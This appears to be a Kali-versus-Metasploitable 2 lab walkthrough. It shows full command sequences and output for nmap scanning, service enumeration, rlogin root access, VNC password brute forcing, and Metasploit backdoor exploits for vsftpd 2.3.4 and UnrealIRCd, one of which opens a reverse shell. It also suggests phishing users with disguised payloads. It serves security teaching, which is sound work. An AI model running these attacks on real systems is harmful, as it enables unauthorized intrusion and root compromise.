- Kali – 192.168.56.101
- Metasploitable – 192.168.56.102
- Hãy thay IP của bạn cho thích hợp
Contents
- 1 Footprinting
- 2 Scanning
- 2.1 Port Scanning
- 2.2 OS Fingerprinting
- 3 Enumeration
- 3.1 FTP (TCP 21) Enumeration
- 3.2 Telnet (TCP 53) Enumeration
- 3.3 SMTP (TCP 25) Enumeration
- 3.4 VNC (TCP 5900) Enumeration
- 3.5 X11 (TCP 6000) Enumeration
- 3.6 RLogin (TCP 513) Enumeration
- 3.7 IRC (TCP 6667) Enumeration
- 4 Exploitation
- 4.1 FTP Exploit
- 4.2 VNC Password Cracking
- 4.3 IRC Exploit
- 4.4 Share this:
- 4.5 Related
Ping
| Let’s ping the victim machine to ensure it’s up and accessible.
root@kali:~# ping -c 3 192.168.56.102
PING 192.168.56.102 (192.168.56.102) 56(84) bytes of data.
64 bytes from 192.168.56.102: icmp_seq=1 ttl=64 time=0.231 ms
64 bytes from 192.168.56.102: icmp_seq=2 ttl=64 time=0.240 ms
64 bytes from 192.168.56.102: icmp_seq=3 ttl=64 time=0.280 ms
--- 192.168.56.102 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.231/0.250/0.280/0.024 ms |
There’s 0% packet loss which means the victim is up.
Traceroute
Let’s run traceroute to check if the victim is hidden behind a firewall.
| root@kali:~# traceroute 192.168.56.102 traceroute to 192.168.56.102 (192.168.56.102), 30 hops max, 60 byte packets 1 192.168.56.102 (192.168.56.102) 0.237 ms 0.160 ms 0.124 ms |
As you can see, there’s only one hop between us and the victim (192.168.56.102). No firewall is blocking us.
Scanning
Port Scanning
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 | root@kali:~# nmap -oA metasploitable-scan -sV -T4 -O 192.168.56.102 Starting Nmap 7.01 ( https://nmap.org ) at 2016-04-25 23:55 PDT mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers Nmap scan report for 192.168.56.102 Host is up (0.00033s latency). Not shown: 979 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd 53/tcp open domain ISC BIND 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 111/tcp open rpcbind 2 (RPC #100000) 512/tcp open exec netkit-rsh rexecd 513/tcp open login? 514/tcp open shell Netkit rshd 1099/tcp open rmiregistry GNU Classpath grmiregistry 1524/tcp open shell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) 6000/tcp open X11 (access denied) 6667/tcp open irc Unreal ircd 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 MAC Address: 08:00:27:6C:48:33 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel |
Let’s run a nmap aggressive (-A) scan. This will run a default set of scripts that will probe the running services more deeply.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 | root@kali:~# nmap -oA metasploitable-agg-scan -A -T4 192.168.56.102 Starting Nmap 7.01 ( https://nmap.org ) at 2016-04-26 00:00 PDT mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers Nmap scan report for 192.168.56.102 Host is up (0.0017s latency). Not shown: 979 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Not valid before: 2010-03-17T14:07:45 |_Not valid after: 2010-04-16T14:07:45 |_ssl-date: 2016-04-25T20:43:52+00:00; -10h17m05s from scanner time. 53/tcp open domain ISC BIND 9.4.2 | dns-nsid: |_ bind.version: 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 |_http-title: Metasploitable2 - Linux 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 56724/tcp mountd | 100005 1,2,3 59390/udp mountd | 100021 1,3,4 46720/udp nlockmgr | 100021 1,3,4 57927/tcp nlockmgr | 100024 1 33610/tcp status |_ 100024 1 59516/udp status 512/tcp open exec netkit-rsh rexecd 513/tcp open login? 514/tcp open shell Netkit rshd 1099/tcp open java-rmi Java RMI Registry 1524/tcp open shell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 56724/tcp mountd | 100005 1,2,3 59390/udp mountd | 100021 1,3,4 46720/udp nlockmgr | 100021 1,3,4 57927/tcp nlockmgr | 100024 1 33610/tcp status |_ 100024 1 59516/udp status 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 | mysql-info: | Protocol: 53 | Version: .0.51a-3ubuntu5 | Thread ID: 1095 | Capabilities flags: 43564 | Some Capabilities: Support41Auth, Speaks41ProtocolNew, ConnectWithDatabase, SupportsTransactions, SwitchToSSLAfterHandshake, LongColumnFlag, SupportsCompression | Status: Autocommit |_ Salt: *()3f)9~5*r#SW<fmruu 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) | vnc-info: | Protocol version: 3.3 | Security types: |_ Unknown security type (33554432) 6000/tcp open X11 (access denied) 6667/tcp open irc Unreal ircd | irc-info: | users: 1 | servers: 1 | lusers: 1 | lservers: 0 | server: irc.Metasploitable.LAN | version: Unreal3.2.8.1. irc.Metasploitable.LAN | uptime: 0 days, 1:14:27 | source ident: nmap | source host: 96A9C42D.97684684.FFFA6D49.IP |_ error: Closing Link: nxszjjhzq[192.168.56.101] (Quit: nxszjjhzq) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) |_ajp-methods: Failed to get a valid response for the OPTION request 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/5.5 MAC Address: 08:00:27:6C:48:33 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 1.71 ms 192.168.56.102 |
OS Fingerprinting
We’ll use both nmap and xprobe2 for active OS fingerprinting, as they use different techniques. nmap determines the victim’s TCP/IP stack implementation and from there the OS, while xprobe2 guesses OSs based on how closely it matches a signature in its signature database.
nmap
According to the nmap script scan, the OS is:
Linux 2.6.x. Also, the victim is running the Ubuntu version of several services like Apache, OpenSSH, and MySQL, which indicates the victim’s Linux distribution to us.
xprobe2
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 | root@kali: ~# xprobe2 -p metasploitable-os-det -X 192.158.56.102 Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu [+] Target is 192.168.56.102 [+] Loading modules. [+] Following modules are loaded: [x] [1] ping:icmp_ping - ICMP echo discovery module [x] [2] ping:tcp_ping - TCP-based ping discovery module [x] [3] ping:udp_ping - UDP-based ping discovery module [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation [x] [5] infogather:portscan - TCP and UDP PortScanner [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module [x] [12] fingerprint:smb - SMB fingerprinting module [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module [+] 13 modules registered [+] Initializing scan engine [+] Running scan engine [-] ping:tcp_ping module: no closed/open TCP ports known on 192.168.56.102. Module test failed [-] ping:udp_ping module: no closed/open UDP ports known on 192.168.56.102. Module test failed [-] No distance calculation. 192.168.56.102 appears to be dead or no ports known [+] Host: 192.168.56.102 is up (Guess probability: 50%) [+] Target: 192.168.56.102 is alive. Round-Trip Time: 0.49599 sec [+] Selected safe Round-Trip Time value is: 0.99198 sec [-] icmp_port_unreach::build_DNS_reply(): gethostbyname() failed! Using static ip for www.securityfocus.com in UDP probe [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known) [-] fingerprint:smb need either TCP port 139 or 445 to run [-] fingerprint:snmp: need UDP port 161 open [+] Primary guess: [+] Host 192.168.56.102 Running OS: "Linux Kernel 2.6.11" (Guess probability: 95%) [+] Other guesses: [+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.20" (Guess probability: 95%) [+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.30" (Guess probability: 95%) [+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.22" (Guess probability: 95%) [+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.28" (Guess probability: 95%) [+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.24" (Guess probability: 95%) [+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.26" (Guess probability: 95%) [+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.26" (Guess probability: 95%) [+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.24" (Guess probability: 95%) [+] Host 192.168.56.102 Running OS: "Linux Kernel 2.4.28" (Guess probability: 95%) [+] Cleaning up scan engine [+] Modules deinitialized [+] Execution completed. |
According to xprobe2, the OS is:
Linux 2.6.11 . This confirms the nmap results.
Enumeration
FTP (TCP 21) Enumeration
According to our nmap aggressive scan, Anonymous FTP login is enabled. Often times, we can get access to the entire system via FTP. Then, since this is an older Linux system, we can steal /etc/passwd and crack the password hashes using hashcat.
So let’s connect. For the password, type in anything.
| root@kali:~# ftp -v 192.168.56.102 Connected to 192.168.56.102. 220 (vsFTPd 2.3.4) Name (192.168.56.102:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. |
Login successful. What do we have access to?
| ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp> |
Nothing is listed, so we can’t access the entire machine. However, we can use FTP to upload a malicious executable that would compromise the system. That’s beyond enumeration, however.
Vsftpd 2.3.4 exploitThe nmap -A scan tells us the FTP version, 2.3.4. This FTP version has been backdoored. There’s a Metasploit exploit (exploit/unix/ftp/vsftpd_234_backdoor) for this vulnerability which should give us a command shell. We’ll do this in “Exploitation”.
Telnet (TCP 53) Enumeration
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | Connect using telnet and grab the banner. root@kali:~# telnet 192.168.56.102 Trying 192.168.56.102... Connected to 192.168.56.102. Escape character is '^]'. _ _ _ _ _ _ ____ _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) | | | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____| |_| Warning: Never expose this VM to an untrusted network! Contact: msfdev[at]metasploit.com Login with msfadmin/msfadmin to get started metasploitable login: {{< /highlight>}} |
| metasploitable login: msfadmin Password: Last login: Mon Apr 25 17:33:10 EDT 2016 from 192.168.56.101 on pts/3 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 ... msfadmin@metasploitable:~$ |
Great! We now have a user-level shell into the victim. We also learned msfadmin is a username. This enables us to brute force passwords.
SMTP (TCP 25) Enumeration
Let’s connect to the victim’s SMTP server using nc (netcat) and enumerate some users using the VRFY command. Let’s try
root and
msfadmin (which we discovered in “Telnet enumeration”).
| root@kali:~# nc 192.168.56.102 25 220 metasploitable.localdomain ESMTP Postfix (Ubuntu) vrfy root 252 2.0.0 root vrfy msfadmin 252 2.0.0 msfadmin |
Both work. To enumerate more usernames, let’s use a Metasploit module (
auxiliary/scanner/smtp/smtp_enum).
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | msf auxiliary(smtp_enum) > show options Module options (auxiliary/scanner/smtp/smtp_enum): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 25 yes The target port THREADS 1 yes The number of concurrent threads UNIXONLY true yes Skip Microsoft bannered servers when testing unix users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt yes The file that contains a list of probable users accounts. msf auxiliary(smtp_enum) > setg RHOSTS 192.168.56.102 RHOSTS => 192.168.56.102 msf auxiliary(smtp_enum) > set THREADS 1000 THREADS => 1000 msf auxiliary(smtp_enum) > run [*] 192.168.56.102:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu) [+] 192.168.56.102:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, news, nobody, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed |
We can use this list of users later on for social engineering attacks. For example, we can masquerade as
postmaster and ask an user to email us his username/password. We can also send out malicious payloads, disguised as patches.
VNC (TCP 5900) Enumeration
Let’s connect to vnc using vncviewer:
| root@kali:~# vncviewer 192.168.56.102::5900 Connected to RFB server, using protocol version 3.3 Performing standard VNC authentication Password: Authentication failure |
We need the password to connect using vnc. We try a few basic passwords like the usernames, but they all fail. We can run a brute force attack against vnc. We’ll do this in “Exploitation”.
X11 (TCP 6000) Enumeration
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | Let's use a Metasploit auxiliary module (auxiliary/scanner/x11/open_x11) to check if we can connect without authentication. msf > use auxiliary/scanner/x11/open_x11 msf auxiliary(open_x11) > show options Module options (auxiliary/scanner/x11/open_x11): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 6000 yes The target port THREADS 1 yes The number of concurrent threads msf auxiliary(open_x11) > setg RHoSTS 192.168.56.102 RHoSTS => 192.168.56.102 msf auxiliary(open_x11) > set THREADS 10000 THREADS => 10000 msf auxiliary(open_x11) > run [*] 192.168.56.102 Access Denied [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed |
Let’s try to SSH into the victim using the telnet credentials, with X forwarding enabled. (Telnet doesn’t support X forwarding.)
| root@kali:~# ssh msfadmin@192.168.56.102 -X msfadmin@192.168.56.102's password: Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 ... Last login: Mon Apr 25 18:35:38 2016 from 192.168.56.101 /usr/bin/X11/xauth: /home/msfadmin/.Xauthority not writable, changes will be ignored |
SSH works! Let’s try to open a GUI application like firefox:
| msfadmin@metasploitable:~$ firefox X11 connection rejected because of wrong authentication. X11 connection rejected because of wrong authentication. Error: cannot open display: localhost:10.0 |
Seems like the
msfadmin user doesn’t have permission for X forwarding. We can return after rooting the victim.
RLogin (TCP 513) Enumeration
Let’s use
rlogin to try to connect as root.
| root@kali:~# rlogin -l root 192.168.56.102 Last login: Mon Apr 25 18:53:27 EDT 2016 from 192.168.56.101 on pts/1 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 ... root@metasploitable:~# whoami root root@metasploitable:~# id uid=0(root) gid=0(root) groups=0(root) |
We obtained root access. No password was required at all!
IRC (TCP 6667) Enumeration
The nmap -A scan tells us the victim is running UnrealIRCD 3.2.8.1, which has been backdoored. We can exploit this vulnerability using an existing Metasploit module in the next section.
Exploitation
FTP Exploit
The victim is running Vsftpd 2.3.4, which has been backdoored. In Metasploit, we use
exploit/unix/ftp/vsftpd_234_backdoor:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | msf > use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 21 yes The target port Exploit target: Id Name -- ---- 0 Automatic msf exploit(vsftpd_234_backdoor) > setg RHOST 192.168.56.102 RHOST => 192.168.56.102 msf exploit(vsftpd_234_backdoor) > run [*] Banner: 220 (vsFTPd 2.3.4) [*] USER: 331 Please specify the password. [+] Backdoor service has been spawned, handling... [+] UID: uid=0(root) gid=0(root) [*] Found shell. [*] Command shell session 1 opened (192.168.56.101:34688 -> 192.168.56.102:6200) at 2016-04-26 16:14:51 -0700 whoami root id uid=0(root) gid=0(root) |
We’ve obtained a root-level shell!
VNC Password Cracking
Let’s use Metasploit auxiliary module – auxiliary/scanner/vnc/vnc_login – to attack the VNC service.
| msf > use auxiliary/scanner/vnc/vnc_login msf auxiliary(vnc_login) > set THREADS 1000 THREADS => 1000 msf auxiliary(vnc_login) > set RHOSTS 192.168.56.102 RHOSTS => 192.168.56.102 msf auxiliary(vnc_login) > run [*] 192.168.56.102:5900 - Starting VNC login sweep [+] 192.168.56.102:5900 - LOGIN SUCCESSFUL: :password [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed |
Password found –
password.
Let’s log in with this password.
| root@kali:~# vncviewer 192.168.56.102 Connected to RFB server, using protocol version 3.3 Performing standard VNC authentication Password: Authentication successful Desktop name "root's X desktop (metasploitable:0)" |
It works! A vncviewer window opens. Metasploitable is headless which means vncviewer isn’t that helpful to us. However, we can open GUI applications from here. For example, we can open firefox and search for stored passwords. Nevertheless, we have a root shell!
IRC Exploit
Again, the victim is running UnrealIRCD 3.2.8.1, which has also been backdoored. In Metasploit, let’s use
exploit/unix/irc/unreal_ircd_3281_backdoor:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | {{< highlight bash >}} msf exploit(unreal_ircd_3281_backdoor) > run [*] Started reverse TCP double handler on 192.168.56.101:4444 [*] Connected to 192.168.56.102:6667... :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead [*] Sending backdoor command... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo x2MPL9s60Vy5WKRQ; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "x2MPL9s60Vy5WKRQ\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.56.101:4444 -> 192.168.56.102:34414) at 2016-04-26 16:01:10 -0700 whoami root id uid=0(root) gid=0(root) |
